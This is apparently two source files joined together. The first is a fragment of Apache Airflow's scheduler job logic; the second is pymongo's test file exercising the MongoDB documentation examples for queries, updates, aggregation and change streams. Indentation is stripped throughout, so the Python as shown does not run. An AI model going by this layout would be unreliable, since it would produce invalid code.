self.log.info("Processing %s", dag.dag_id)
dag_run = self.create_dag_run(dag)
if dag_run:
expected_start_date = dag.following_schedule(dag_run.execution_date)
if expected_start_date:
schedule_delay = dag_run.start_date - expected_start_date
Stats.timing(
'dagrun.schedule_delay.{dag_id}'.format(dag_id=dag.dag_id),
schedule_delay)
self.log.info("Created %s", dag_run)
self._process_task_instances(dag, tis_out)
self.manage_slas(dag)
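# Editor's note -- an illustrative sketch (hypothetical): the schedule_delay
# metric emitted above measures the gap between when a run should have
# started (the schedule slot following its execution_date) and when it
# actually started. For a daily schedule:
def _demo_schedule_delay():
    import datetime
    execution_date = datetime.datetime(2019, 1, 1)                 # period start
    expected_start = execution_date + datetime.timedelta(days=1)   # next slot
    actual_start = datetime.datetime(2019, 1, 2, 0, 0, 42)
    return actual_start - expected_start  # timedelta(seconds=42)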
@provide_session
def _process_executor_events(self, simple_dag_bag, session=None):
"""
Respond to executor events.
"""
# TODO: this shares quite a lot of code with _manage_executor_state
TI = models.TaskInstance
for key, state in list(self.executor.get_event_buffer(simple_dag_bag.dag_ids)
.items()):
dag_id, task_id, execution_date, try_number = key
self.log.info(
"Executor reports execution of %s.%s execution_date=%s "
"exited with status %s for try_number %s",
dag_id, task_id, execution_date, state, try_number
)
if state == State.FAILED or state == State.SUCCESS:
qry = session.query(TI).filter(TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date)
ti = qry.first()
if not ti:
self.log.warning("TaskInstance %s went missing from the database", ti)
continue
# TODO: should we fail RUNNING as well, as we do in Backfills?
if ti.try_number == try_number and ti.state == State.QUEUED:
msg = ("Executor reports task instance {} finished ({}) "
"although the task says its {}. Was the task "
"killed externally?".format(ti, state, ti.state))
self.log.error(msg)
try:
simple_dag = simple_dag_bag.get_dag(dag_id)
dagbag = models.DagBag(simple_dag.full_filepath)
dag = dagbag.get_dag(dag_id)
ti.task = dag.get_task(task_id)
ti.handle_failure(msg)
except Exception:
self.log.error("Cannot load the dag bag to handle failure for %s"
". Setting task to FAILED without callbacks or "
"retries. Do you have enough resources?", ti)
ti.state = State.FAILED
session.merge(ti)
session.commit()
def _execute(self):
self.log.info("Starting the scheduler")
# DAGs can be pickled for easier remote execution by some executors
pickle_dags = False
if self.do_pickle and self.executor.__class__ not in \
(executors.LocalExecutor, executors.SequentialExecutor):
pickle_dags = True
self.log.info("Processing each file at most %s times", self.num_runs)
# Build up a list of Python files that could contain DAGs
self.log.info("Searching for files in %s", self.subdir)
known_file_paths = list_py_file_paths(self.subdir)
self.log.info("There are %s files in %s", len(known_file_paths), self.subdir)
def processor_factory(file_path):
return DagFileProcessor(file_path,
pickle_dags,
self.dag_ids)
# When using sqlite, we do not use async_mode
# so the scheduler job and DAG parser don't access the DB at the same time.
async_mode = not self.using_sqlite
processor_timeout_seconds = conf.getint('core', 'dagbag_import_timeout')
processor_timeout = timedelta(seconds=processor_timeout_seconds)
self.processor_agent = DagFileProcessorAgent(self.subdir,
known_file_paths,
self.num_runs,
processor_factory,
processor_timeout,
async_mode)
try:
self._execute_helper()
except Exception:
self.log.exception("Exception when executing execute_helper")
finally:
self.processor_agent.end()
self.log.info("Exited execute loop")
def _execute_helper(self):
"""
The actual scheduler loop. The main steps in the loop are:
#. Harvest DAG parsing results through DagFileProcessorAgent
#. Find and queue executable tasks
#. Change task instance state in DB
#. Queue tasks in executor
#. Heartbeat executor
#. Execute queued tasks in executor asynchronously
#. Sync on the states of running tasks
Following is a graphic representation of these steps.
.. image:: ../docs/img/scheduler_loop.jpg
:rtype: None
"""
self.executor.start()
self.log.info("Resetting orphaned tasks for active dag runs")
self.reset_state_for_orphaned_tasks()
# Start after resetting orphaned tasks to avoid stressing out DB.
self.processor_agent.start()
execute_start_time = timezone.utcnow()
# Last time that self.heartbeat() was called.
last_self_heartbeat_time = timezone.utcnow()
# For the execute duration, parse and schedule DAGs
while True:
self.log.debug("Starting Loop...")
loop_start_time = time.time()
if self.using_sqlite:
self.processor_agent.heartbeat()
# For the sqlite case w/ 1 thread, wait until the processor
# is finished to avoid concurrent access to the DB.
self.log.debug(
"Waiting for processors to finish since we're using sqlite")
self.processor_agent.wait_until_finished()
self.log.debug("Harvesting DAG parsing results")
simple_dags = self.processor_agent.harvest_simple_dags()
self.log.debug("Harvested {} SimpleDAGs".format(len(simple_dags)))
# Send tasks for execution if available
simple_dag_bag = SimpleDagBag(simple_dags)
if len(simple_dags) > 0:
try:
# Handle cases where a DAG run state is set (perhaps manually) to
# a non-running state. Handle task instances that belong to
# DAG runs in those states
# If a task instance is up for retry but the corresponding DAG run
# isn't running, mark the task instance as FAILED so we don't try
# to re-run it.
self._change_state_for_tis_without_dagrun(simple_dag_bag,
[State.UP_FOR_RETRY],
State.FAILED)
# If a task instance is scheduled or queued or up for reschedule,
# but the corresponding DAG run isn't running, set the state to
# NONE so we don't try to re-run it.
self._change_state_for_tis_without_dagrun(simple_dag_bag,
[State.QUEUED,
State.SCHEDULED,
State.UP_FOR_RESCHEDULE],
State.NONE)
self._execute_task_instances(simple_dag_bag,
(State.SCHEDULED,))
except Exception as e:
self.log.error("Error queuing tasks")
self.log.exception(e)
continue
# Call heartbeats
self.log.debug("Heartbeating the executor")
self.executor.heartbeat()
self._change_state_for_tasks_failed_to_execute()
# Process events from the executor
self._process_executor_events(simple_dag_bag)
# Heartbeat the scheduler periodically
time_since_last_heartbeat = (timezone.utcnow() -
last_self_heartbeat_time).total_seconds()
if time_since_last_heartbeat > self.heartrate:
self.log.debug("Heartbeating the scheduler")
self.heartbeat()
last_self_heartbeat_time = timezone.utcnow()
is_unit_test = conf.getboolean('core', 'unit_test_mode')
loop_end_time = time.time()
loop_duration = loop_end_time - loop_start_time
self.log.debug(
"Ran scheduling loop in %.2f seconds",
loop_duration)
if not is_unit_test:
self.log.debug("Sleeping for %.2f seconds", self._processor_poll_interval)
time.sleep(self._processor_poll_interval)
if self.processor_agent.done:
self.log.info("Exiting scheduler loop as all files"
" have been processed {} times".format(self.num_runs))
break
if loop_duration < 1 and not is_unit_test:
sleep_length = 1 - loop_duration
self.log.debug(
"Sleeping for %.2f seconds to prevent excessive logging",
sleep_length)
sleep(sleep_length)
# Stop any processors
self.processor_agent.terminate()
# Verify that all files were processed, and if so, deactivate DAGs that
# haven't been touched by the scheduler as they likely have been
# deleted.
if self.processor_agent.all_files_processed:
self.log.info(
"Deactivating DAGs that haven't been touched since %s",
execute_start_time.isoformat()
)
models.DAG.deactivate_stale_dags(execute_start_time)
self.executor.end()
settings.Session.remove()
@provide_session
def process_file(self, file_path, pickle_dags=False, session=None):
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Pickle the DAG and save it to the DB (if necessary).
3. For each DAG, see what tasks should run and create appropriate task
instances in the DB.
4. Record any errors importing the file into ORM
5. Kill (in ORM) any task instances belonging to the DAGs that haven't
issued a heartbeat in a while.
Returns a list of SimpleDag objects that represent the DAGs found in
the file
:param file_path: the path to the Python file that should be executed
:type file_path: unicode
:param pickle_dags: whether to serialize the DAGs found in the file and
save them to the db
:type pickle_dags: bool
:return: a list of SimpleDags made from the Dags found in the file
:rtype: list[airflow.utils.dag_processing.SimpleDag]
"""
self.log.info("Processing file %s for tasks to queue", file_path)
# As DAGs are parsed from this file, they will be converted into SimpleDags
simple_dags = []
try:
dagbag = models.DagBag(file_path, include_examples=False)
except Exception:
self.log.exception("Failed at reloading the DAG file %s", file_path)
Stats.incr('dag_file_refresh_error', 1, 1)
return []
if len(dagbag.dags) > 0:
self.log.info("DAG(s) %s retrieved from %s", dagbag.dags.keys(), file_path)
else:
self.log.warning("No viable dags retrieved from %s", file_path)
self.update_import_errors(session, dagbag)
return []
# Save individual DAGs in the ORM and update DagModel.last_scheduled_time
for dag in dagbag.dags.values():
dag.sync_to_db()
paused_dag_ids = [dag.dag_id for dag in dagbag.dags.values()
if dag.is_paused]
# Pickle the DAGs (if necessary) and put them into a SimpleDag
for dag_id in dagbag.dags:
# Only return DAGs that are not paused
if dag_id not in paused_dag_ids:
dag = dagbag.get_dag(dag_id)
pickle_id = None
if pickle_dags:
pickle_id = dag.pickle(session).id
simple_dags.append(SimpleDag(dag, pickle_id=pickle_id))
if len(self.dag_ids) > 0:
dags = [dag for dag in dagbag.dags.values()
if dag.dag_id in self.dag_ids and
dag.dag_id not in paused_dag_ids]
else:
dags = [dag for dag in dagbag.dags.values()
if not dag.parent_dag and
dag.dag_id not in paused_dag_ids]
# Not using multiprocessing.Queue() since it's no longer a separate
# process and due to some unusual behavior. (empty() incorrectly
# returns true as described in https://bugs.python.org/issue23582 )
ti_keys_to_schedule = []
self._process_dags(dagbag, dags, ti_keys_to_schedule)
for ti_key in ti_keys_to_schedule:
dag = dagbag.dags[ti_key[0]]
task = dag.get_task(ti_key[1])
ti = models.TaskInstance(task, ti_key[2])
ti.refresh_from_db(session=session, lock_for_update=True)
# We can defer the task dependency checks to the workers themselves
# since they can be expensive to run in the scheduler.
dep_context = DepContext(deps=QUEUE_DEPS, ignore_task_deps=True)
# Only schedule tasks that have their dependencies met, e.g. to avoid
# a task that recently got its state changed to RUNNING from somewhere
# other than the scheduler from getting its state overwritten.
# TODO(aoen): It's not great that we have to check all the task instance
# dependencies twice; once to get the task scheduled, and again to actually
# run the task. We should try to come up with a way to only check them once.
if ti.are_dependencies_met(
dep_context=dep_context,
session=session,
verbose=True):
# Task starts out in the scheduled state. All tasks in the
# scheduled state will be sent to the executor
ti.state = State.SCHEDULED
# Also save this task instance to the DB.
self.log.info("Creating / updating %s in ORM", ti)
session.merge(ti)
# commit batch
session.commit()
# Record import errors into the ORM
try:
self.update_import_errors(session, dagbag)
except Exception:
self.log.exception("Error logging import errors!")
try:
dagbag.kill_zombies()
except Exception:
self.log.exception("Error killing zombies!")
return simple_dags
@provide_session
def heartbeat_callback(self, session=None):
Stats.incr('scheduler_heartbeat', 1, 1)
|
test_examples.py
|
# Copyright 2017 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""MongoDB documentation examples in Python."""
import datetime
import sys
import threading
sys.path[0:0] = [""]
import pymongo
from pymongo.errors import ConnectionFailure, OperationFailure
from pymongo.read_concern import ReadConcern
from pymongo.read_preferences import ReadPreference
from pymongo.write_concern import WriteConcern
from test import client_context, unittest, IntegrationTest
from test.utils import rs_or_single_client
class TestSampleShellCommands(unittest.TestCase):
@classmethod
@client_context.require_connection
def setUpClass(cls):
cls.client = rs_or_single_client(w="majority")
# Run once before any tests run.
cls.client.pymongo_test.inventory.drop()
@classmethod
def tearDownClass(cls):
client_context.client.drop_database("pymongo_test")
def tearDown(self):
# Run after every test.
self.client.pymongo_test.inventory.drop()
def test_first_three_examples(self):
db = client_context.client.pymongo_test
# Start Example 1
db.inventory.insert_one(
{"item": "canvas",
"qty": 100,
"tags": ["cotton"],
"size": {"h": 28, "w": 35.5, "uom": "cm"}})
# End Example 1
self.assertEqual(db.inventory.count_documents({}), 1)
# Start Example 2
cursor = db.inventory.find({"item": "canvas"})
# End Example 2
self.assertEqual(len(list(cursor)), 1)
# Start Example 3
db.inventory.insert_many([
{"item": "journal",
"qty": 25,
"tags": ["blank", "red"],
"size": {"h": 14, "w": 21, "uom": "cm"}},
{"item": "mat",
"qty": 85,
"tags": ["gray"],
"size": {"h": 27.9, "w": 35.5, "uom": "cm"}},
{"item": "mousepad",
"qty": 25,
"tags": ["gel", "blue"],
"size": {"h": 19, "w": 22.85, "uom": "cm"}}])
# End Example 3
self.assertEqual(db.inventory.count_documents({}), 4)
def test_query_top_level_fields(self):
db = client_context.client.pymongo_test
# Start Example 6
db.inventory.insert_many([
{"item": "journal",
"qty": 25,
"size": {"h": 14, "w": 21, "uom": "cm"},
"status": "A"},
{"item": "notebook",
"qty": 50,
"size": {"h": 8.5, "w": 11, "uom": "in"},
"status": "A"},
{"item": "paper",
"qty": 100,
"size": {"h": 8.5, "w": 11, "uom": "in"},
"status": "D"},
{"item": "planner",
"qty": 75, "size": {"h": 22.85, "w": 30, "uom": "cm"},
"status": "D"},
{"item": "postcard",
"qty": 45,
"size": {"h": 10, "w": 15.25, "uom": "cm"},
"status": "A"}])
# End Example 6
self.assertEqual(db.inventory.count_documents({}), 5)
# Start Example 7
cursor = db.inventory.find({})
# End Example 7
self.assertEqual(len(list(cursor)), 5)
# Start Example 9
cursor = db.inventory.find({"status": "D"})
# End Example 9
self.assertEqual(len(list(cursor)), 2)
# Start Example 10
cursor = db.inventory.find({"status": {"$in": ["A", "D"]}})
# End Example 10
self.assertEqual(len(list(cursor)), 5)
# Start Example 11
cursor = db.inventory.find({"status": "A", "qty": {"$lt": 30}})
# End Example 11
self.assertEqual(len(list(cursor)), 1)
# Start Example 12
cursor = db.inventory.find(
{"$or": [{"status": "A"}, {"qty": {"$lt": 30}}]})
# End Example 12
self.assertEqual(len(list(cursor)), 3)
# Start Example 13
cursor = db.inventory.find({
"status": "A",
"$or": [{"qty": {"$lt": 30}}, {"item": {"$regex": "^p"}}]})
# End Example 13
self.assertEqual(len(list(cursor)), 2)
def test_query_embedded_documents(self):
db = client_context.client.pymongo_test
# Start Example 14
# Subdocument key order matters in a few of these examples so we have
# to use bson.son.SON instead of a Python dict.
from bson.son import SON
db.inventory.insert_many([
{"item": "journal",
"qty": 25,
"size": SON([("h", 14), ("w", 21), ("uom", "cm")]),
"status": "A"},
{"item": "notebook",
"qty": 50,
"size": SON([("h", 8.5), ("w", 11), ("uom", "in")]),
"status": "A"},
{"item": "paper",
"qty": 100,
"size": SON([("h", 8.5), ("w", 11), ("uom", "in")]),
"status": "D"},
{"item": "planner",
"qty": 75,
"size": SON([("h", 22.85), ("w", 30), ("uom", "cm")]),
"status": "D"},
{"item": "postcard",
"qty": 45,
"size": SON([("h", 10), ("w", 15.25), ("uom", "cm")]),
"status": "A"}])
# End Example 14
# Start Example 15
cursor = db.inventory.find(
{"size": SON([("h", 14), ("w", 21), ("uom", "cm")])})
# End Example 15
self.assertEqual(len(list(cursor)), 1)
# Start Example 16
cursor = db.inventory.find(
{"size": SON([("w", 21), ("h", 14), ("uom", "cm")])})
# End Example 16
self.assertEqual(len(list(cursor)), 0)
# Start Example 17
cursor = db.inventory.find({"size.uom": "in"})
# End Example 17
self.assertEqual(len(list(cursor)), 2)
# Start Example 18
cursor = db.inventory.find({"size.h": {"$lt": 15}})
# End Example 18
self.assertEqual(len(list(cursor)), 4)
# Start Example 19
cursor = db.inventory.find(
{"size.h": {"$lt": 15}, "size.uom": "in", "status": "D"})
# End Example 19
self.assertEqual(len(list(cursor)), 1)
def test_query_arrays(self):
db = client_context.client.pymongo_test
# Start Example 20
db.inventory.insert_many([
{"item": "journal",
"qty": 25,
"tags": ["blank", "red"],
"dim_cm": [14, 21]},
{"item": "notebook",
"qty": 50,
"tags": ["red", "blank"],
"dim_cm": [14, 21]},
{"item": "paper",
"qty": 100,
"tags": ["red", "blank", "plain"],
"dim_cm": [14, 21]},
{"item": "planner",
"qty": 75,
"tags": ["blank", "red"],
"dim_cm": [22.85, 30]},
{"item": "postcard",
"qty": 45,
"tags": ["blue"],
"dim_cm": [10, 15.25]}])
# End Example 20
# Start Example 21
cursor = db.inventory.find({"tags": ["red", "blank"]})
# End Example 21
self.assertEqual(len(list(cursor)), 1)
# Start Example 22
cursor = db.inventory.find({"tags": {"$all": ["red", "blank"]}})
# End Example 22
self.assertEqual(len(list(cursor)), 4)
# Start Example 23
cursor = db.inventory.find({"tags": "red"})
# End Example 23
self.assertEqual(len(list(cursor)), 4)
# Start Example 24
cursor = db.inventory.find({"dim_cm": {"$gt": 25}})
# End Example 24
self.assertEqual(len(list(cursor)), 1)
# Start Example 25
cursor = db.inventory.find({"dim_cm": {"$gt": 15, "$lt": 20}})
# End Example 25
self.assertEqual(len(list(cursor)), 4)
# Start Example 26
cursor = db.inventory.find(
{"dim_cm": {"$elemMatch": {"$gt": 22, "$lt": 30}}})
# End Example 26
self.assertEqual(len(list(cursor)), 1)
# Start Example 27
cursor = db.inventory.find({"dim_cm.1": {"$gt": 25}})
# End Example 27
self.assertEqual(len(list(cursor)), 1)
# Start Example 28
cursor = db.inventory.find({"tags": {"$size": 3}})
# End Example 28
self.assertEqual(len(list(cursor)), 1)
def test_query_array_of_documents(self):
db = client_context.client.pymongo_test
# Start Example 29
# Subdocument key order matters in a few of these examples so we have
# to use bson.son.SON instead of a Python dict.
from bson.son import SON
db.inventory.insert_many([
{"item": "journal",
"instock": [
SON([("warehouse", "A"), ("qty", 5)]),
SON([("warehouse", "C"), ("qty", 15)])]},
{"item": "notebook",
"instock": [
SON([("warehouse", "C"), ("qty", 5)])]},
{"item": "paper",
"instock": [
SON([("warehouse", "A"), ("qty", 60)]),
SON([("warehouse", "B"), ("qty", 15)])]},
{"item": "planner",
"instock": [
SON([("warehouse", "A"), ("qty", 40)]),
SON([("warehouse", "B"), ("qty", 5)])]},
{"item": "postcard",
"instock": [
SON([("warehouse", "B"), ("qty", 15)]),
SON([("warehouse", "C"), ("qty", 35)])]}])
# End Example 29
# Start Example 30
cursor = db.inventory.find(
{"instock": SON([("warehouse", "A"), ("qty", 5)])})
# End Example 30
self.assertEqual(len(list(cursor)), 1)
# Start Example 31
cursor = db.inventory.find(
{"instock": SON([("qty", 5), ("warehouse", "A")])})
# End Example 31
self.assertEqual(len(list(cursor)), 0)
# Start Example 32
cursor = db.inventory.find({'instock.0.qty': {"$lte": 20}})
# End Example 32
self.assertEqual(len(list(cursor)), 3)
# Start Example 33
cursor = db.inventory.find({'instock.qty': {"$lte": 20}})
# End Example 33
self.assertEqual(len(list(cursor)), 5)
# Start Example 34
cursor = db.inventory.find(
{"instock": {"$elemMatch": {"qty": 5, "warehouse": "A"}}})
# End Example 34
self.assertEqual(len(list(cursor)), 1)
# Start Example 35
cursor = db.inventory.find(
{"instock": {"$elemMatch": {"qty": {"$gt": 10, "$lte": 20}}}})
# End Example 35
self.assertEqual(len(list(cursor)), 3)
# Start Example 36
cursor = db.inventory.find({"instock.qty": {"$gt": 10, "$lte": 20}})
# End Example 36
self.assertEqual(len(list(cursor)), 4)
# Start Example 37
cursor = db.inventory.find(
{"instock.qty": 5, "instock.warehouse": "A"})
# End Example 37
self.assertEqual(len(list(cursor)), 2)
def test_query_null(self):
db = client_context.client.pymongo_test
# Start Example 38
db.inventory.insert_many([{"_id": 1, "item": None}, {"_id": 2}])
# End Example 38
# Start Example 39
cursor = db.inventory.find({"item": None})
# End Example 39
self.assertEqual(len(list(cursor)), 2)
# Start Example 40
cursor = db.inventory.find({"item": {"$type": 10}})
# End Example 40
self.assertEqual(len(list(cursor)), 1)
# Start Example 41
cursor = db.inventory.find({"item": {"$exists": False}})
# End Example 41
self.assertEqual(len(list(cursor)), 1)
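# Editor's note: the three queries above differ in scope --
# {"item": None} matches documents where item is null OR missing
# (2 docs), {"item": {"$type": 10}} matches only an explicit BSON
# null (1 doc), and {"item": {"$exists": False}} matches only
# documents missing the field entirely (1 doc).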
def test_projection(self):
db = client_context.client.pymongo_test
# Start Example 42
db.inventory.insert_many([
{"item": "journal",
"status": "A",
"size": {"h": 14, "w": 21, "uom": "cm"},
"instock": [{"warehouse": "A", "qty": 5}]},
{"item": "notebook",
"status": "A",
"size": {"h": 8.5, "w": 11, "uom": "in"},
"instock": [{"warehouse": "C", "qty": 5}]},
{"item": "paper",
"status": "D",
"size": {"h": 8.5, "w": 11, "uom": "in"},
"instock": [{"warehouse": "A", "qty": 60}]},
{"item": "planner",
"status": "D",
"size": {"h": 22.85, "w": 30, "uom": "cm"},
"instock": [{"warehouse": "A", "qty": 40}]},
{"item": "postcard",
"status": "A",
"size": {"h": 10, "w": 15.25, "uom": "cm"},
"instock": [
{"warehouse": "B", "qty": 15},
{"warehouse": "C", "qty": 35}]}])
# End Example 42
# Start Example 43
cursor = db.inventory.find({"status": "A"})
# End Example 43
self.assertEqual(len(list(cursor)), 3)
# Start Example 44
cursor = db.inventory.find(
{"status": "A"}, {"item": 1, "status": 1})
# End Example 44
for doc in cursor:
self.assertTrue("_id" in doc)
self.assertTrue("item" in doc)
self.assertTrue("status" in doc)
self.assertFalse("size" in doc)
self.assertFalse("instock" in doc)
# Start Example 45
cursor = db.inventory.find(
{"status": "A"}, {"item": 1, "status": 1, "_id": 0})
# End Example 45
for doc in cursor:
self.assertFalse("_id" in doc)
self.assertTrue("item" in doc)
self.assertTrue("status" in doc)
self.assertFalse("size" in doc)
self.assertFalse("instock" in doc)
# Start Example 46
cursor = db.inventory.find(
{"status": "A"}, {"status": 0, "instock": 0})
# End Example 46
for doc in cursor:
self.assertTrue("_id" in doc)
self.assertTrue("item" in doc)
self.assertFalse("status" in doc)
self.assertTrue("size" in doc)
self.assertFalse("instock" in doc)
# Start Example 47
cursor = db.inventory.find(
{"status": "A"}, {"item": 1, "status": 1, "size.uom": 1})
# End Example 47
for doc in cursor:
self.assertTrue("_id" in doc)
self.assertTrue("item" in doc)
self.assertTrue("status" in doc)
self.assertTrue("size" in doc)
self.assertFalse("instock" in doc)
size = doc['size']
self.assertTrue('uom' in size)
self.assertFalse('h' in size)
self.assertFalse('w' in size)
# Start Example 48
cursor = db.inventory.find({"status": "A"}, {"size.uom": 0})
# End Example 48
for doc in cursor:
self.assertTrue("_id" in doc)
self.assertTrue("item" in doc)
self.assertTrue("status" in doc)
self.assertTrue("size" in doc)
self.assertTrue("instock" in doc)
size = doc['size']
self.assertFalse('uom' in size)
self.assertTrue('h' in size)
self.assertTrue('w' in size)
# Start Example 49
cursor = db.inventory.find(
{"status": "A"}, {"item": 1, "status": 1, "instock.qty": 1})
# End Example 49
for doc in cursor:
self.assertTrue("_id" in doc)
self.assertTrue("item" in doc)
self.assertTrue("status" in doc)
self.assertFalse("size" in doc)
self.assertTrue("instock" in doc)
for subdoc in doc['instock']:
self.assertFalse('warehouse' in subdoc)
self.assertTrue('qty' in subdoc)
# Start Example 50
cursor = db.inventory.find(
{"status": "A"},
{"item": 1, "status": 1, "instock": {"$slice": -1}})
# End Example 50
for doc in cursor:
self.assertTrue("_id" in doc)
self.assertTrue("item" in doc)
self.assertTrue("status" in doc)
self.assertFalse("size" in doc)
self.assertTrue("instock" in doc)
self.assertEqual(len(doc["instock"]), 1)
def test_update_and_replace(self):
db = client_context.client.pymongo_test
# Start Example 51
db.inventory.insert_many([
{"item": "canvas",
"qty": 100,
"size": {"h": 28, "w": 35.5, "uom": "cm"},
"status": "A"},
{"item": "journal",
"qty": 25,
"size": {"h": 14, "w": 21, "uom": "cm"},
"status": "A"},
{"item": "mat",
"qty": 85,
"size": {"h": 27.9, "w": 35.5, "uom": "cm"},
"status": "A"},
{"item": "mousepad",
"qty": 25,
"size": {"h": 19, "w": 22.85, "uom": "cm"},
"status": "P"},
{"item": "notebook",
"qty": 50,
"size": {"h": 8.5, "w": 11, "uom": "in"},
"status": "P"},
{"item": "paper",
"qty": 100,
"size": {"h": 8.5, "w": 11, "uom": "in"},
"status": "D"},
{"item": "planner",
"qty": 75,
"size": {"h": 22.85, "w": 30, "uom": "cm"},
"status": "D"},
{"item": "postcard",
"qty": 45,
"size": {"h": 10, "w": 15.25, "uom": "cm"},
"status": "A"},
{"item": "sketchbook",
"qty": 80,
"size": {"h": 14, "w": 21, "uom": "cm"},
"status": "A"},
{"item": "sketch pad",
"qty": 95,
"size": {"h": 22.85, "w": 30.5, "uom": "cm"},
"status": "A"}])
# End Example 51
# Start Example 52
db.inventory.update_one(
{"item": "paper"},
{"$set": {"size.uom": "cm", "status": "P"},
"$currentDate": {"lastModified": True}})
# End Example 52
for doc in db.inventory.find({"item": "paper"}):
self.assertEqual(doc["size"]["uom"], "cm")
self.assertEqual(doc["status"], "P")
self.assertTrue("lastModified" in doc)
# Start Example 53
db.inventory.update_many(
{"qty": {"$lt": 50}},
{"$set": {"size.uom": "in", "status": "P"},
"$currentDate": {"lastModified": True}})
# End Example 53
for doc in db.inventory.find({"qty": {"$lt": 50}}):
self.assertEqual(doc["size"]["uom"], "in")
self.assertEqual(doc["status"], "P")
self.assertTrue("lastModified" in doc)
# Start Example 54
db.inventory.replace_one(
{"item": "paper"},
{"item": "paper",
"instock": [
{"warehouse": "A", "qty": 60},
{"warehouse": "B", "qty": 40}]})
# End Example 54
for doc in db.inventory.find({"item": "paper"}, {"_id": 0}):
self.assertEqual(len(doc.keys()), 2)
self.assertTrue("item" in doc)
self.assertTrue("instock" in doc)
self.assertEqual(len(doc["instock"]), 2)
def test_delete(self):
db = client_context.client.pymongo_test
# Start Example 55
db.inventory.insert_many([
{"item": "journal",
"qty": 25,
"size": {"h": 14, "w": 21, "uom": "cm"},
"status": "A"},
{"item": "notebook",
"qty": 50,
"size": {"h": 8.5, "w": 11, "uom": "in"},
"status": "P"},
{"item": "paper",
"qty": 100,
"size": {"h": 8.5, "w": 11, "uom": "in"},
"status": "D"},
{"item": "planner",
"qty": 75,
"size": {"h": 22.85, "w": 30, "uom": "cm"},
"status": "D"},
{"item": "postcard",
"qty": 45,
"size": {"h": 10, "w": 15.25, "uom": "cm"},
"status": "A"}])
# End Example 55
self.assertEqual(db.inventory.count_documents({}), 5)
# Start Example 57
db.inventory.delete_many({"status": "A"})
# End Example 57
self.assertEqual(db.inventory.count_documents({}), 3)
# Start Example 58
db.inventory.delete_one({"status": "D"})
# End Example 58
self.assertEqual(db.inventory.count_documents({}), 2)
# Start Example 56
db.inventory.delete_many({})
# End Example 56
self.assertEqual(db.inventory.count_documents({}), 0)
@client_context.require_version_min(3, 5, 11)
@client_context.require_replica_set
@client_context.require_no_mmap
def test_change_streams(self):
db = client_context.client.pymongo_test
done = False
def insert_docs():
while not done:
db.inventory.insert_one({"username": "alice"})
db.inventory.delete_one({"username": "alice"})
t = threading.Thread(target=insert_docs)
t.start()
try:
# 1. The database for reactive, real-time applications
# Start Changestream Example 1
cursor = db.inventory.watch()
document = next(cursor)
# End Changestream Example 1
# Start Changestream Example 2
cursor = db.inventory.watch(full_document='updateLookup')
document = next(cursor)
# End Changestream Example 2
# Start Changestream Example 3
resume_token = cursor.resume_token
cursor = db.inventory.watch(resume_after=resume_token)
document = next(cursor)
# End Changestream Example 3
# Start Changestream Example 4
pipeline = [
{'$match': {'fullDocument.username': 'alice'}},
{'$addFields': {'newField': 'this is an added field!'}}
]
cursor = db.inventory.watch(pipeline=pipeline)
document = next(cursor)
# End Changestream Example 4
finally:
done = True
t.join()
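# Editor's note -- an illustrative sketch (hypothetical, not part of the
# documented examples): a resumable watch loop records the last token seen
# and reopens the stream from it after a restart:
#
#     resume_token = None
#     with db.inventory.watch() as stream:
#         for change in stream:
#             resume_token = change['_id']
#             ...  # process the change
#     # later, e.g. after a restart:
#     # db.inventory.watch(resume_after=resume_token)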
def test_aggregate_examples(self):
db = client_context.client.pymongo_test
# Start Aggregation Example 1
db.sales.aggregate([
{"$match": {"items.fruit": "banana"}},
{"$sort": {"date": 1}}
])
# End Aggregation Example 1
# Start Aggregation Example 2
db.sales.aggregate([
{"$unwind": "$items"},
{"$match": {"items.fruit": "banana"}},
{"$group": {
"_id": {"day": {"$dayOfWeek": "$date"}},
"count": {"$sum": "$items.quantity"}}
},
{"$project": {
"dayOfWeek": "$_id.day",
"numberSold": "$count",
"_id": 0}
},
{"$sort": {"numberSold": 1}}
])
# End Aggregation Example 2
# Start Aggregation Example 3
db.sales.aggregate([
{"$unwind": "$items"},
{"$group": {
"_id": {"day": {"$dayOfWeek": "$date"}},
"items_sold": {"$sum": "$items.quantity"},
"revenue": {
"$sum": {
"$multiply": [
"$items.quantity", "$items.price"]
}
}
}
},
{"$project": {
"day": "$_id.day",
"revenue": 1,
"items_sold": 1,
"discount": {
"$cond": {
"if": {"$lte": ["$revenue", 250]},
"then": 25,
"else": 0
}
}
}
}
])
# End Aggregation Example 3
# $lookup was new in 3.2. The let and pipeline options
# were added in 3.6.
if client_context.version.at_least(3, 6, 0):
# Start Aggregation Example 4
db.air_alliances.aggregate([
{"$lookup": {
"from": "air_airlines",
"let": {"constituents": "$airlines"},
"pipeline": [
{"$match": {"$expr": {"$in": ["$name", "$$constituents"]}}}
],
"as": "airlines"
}
},
{"$project": {
"_id": 0,
"name": 1,
"airlines": {
"$filter": {
"input": "$airlines",
"as": "airline",
"cond": {"$eq": ["$$airline.country", "Canada"]}
}
}
}
}
])
# End Aggregation Example 4
def test_commands(self):
db = client_context.client.pymongo_test
db.restaurants.insert_one({})
# Start runCommand Example 1
db.command("buildInfo")
# End runCommand Example 1
# Start runCommand Example 2
db.command("collStats", "restaurants")
# End runCommand Example 2
def test_index_management(self):
db = client_context.client.pymongo_test
# Start Index Example 1
db.records.create_index("score")
# End Index Example 1
# Start Index Example 2
db.restaurants.create_index(
[("cuisine", pymongo.ASCENDING), ("name", pymongo.ASCENDING)],
partialFilterExpression={"rating": {"$gt": 5}}
)
# End Index Example 2
@client_context.require_version_min(3, 6, 0)
@client_context.require_replica_set
def test_misc(self):
# Marketing examples
client = client_context.client
self.addCleanup(client.drop_database, "test")
self.addCleanup(client.drop_database, "my_database")
# 2. Tunable consistency controls
collection = client.my_database.my_collection
with client.start_session() as session:
collection.insert_one({'_id': 1}, session=session)
collection.update_one(
{'_id': 1}, {"$set": {"a": 1}}, session=session)
for doc in collection.find({}, session=session):
pass
# 3. Exploiting the power of arrays
collection = client.test.array_updates_test
collection.update_one(
{'_id': 1},
{"$set": {"a.$[i].b": 2}},
